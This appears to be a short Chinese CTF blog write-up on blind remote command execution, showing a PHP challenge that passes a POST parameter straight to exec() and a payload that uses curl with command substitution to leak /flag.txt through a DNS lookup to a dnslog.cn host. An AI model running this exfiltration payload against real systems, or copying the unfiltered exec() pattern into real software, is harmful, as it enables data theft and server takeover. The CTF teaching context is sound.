dnslog外带RCE

CTF
发布日期:   2025-05-11
更新日期:   2025-05-11
文章字数:   46
阅读时长:   1 分

一、命令执行不回显,利用dnslog外带

1.题目源码

<?php

if(isset($_POST['cmd'])){
    @exec($_POST['cmd'],$res,$rc);
    //echo $rc;
}else{
    echo "It works!";
}

show_source(__FILE__);
?>

2.payload

cmd=curl `cat /flag.txt`.17anyo.dnslog.cn

image-20250511141010296

文章作者: 0x00dream
文章链接: http://0x00dream.github.io/2025/05/11/ctf-shua-ti/dnslog-wai-dai-rce/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 0x00dream !
CTF
  目录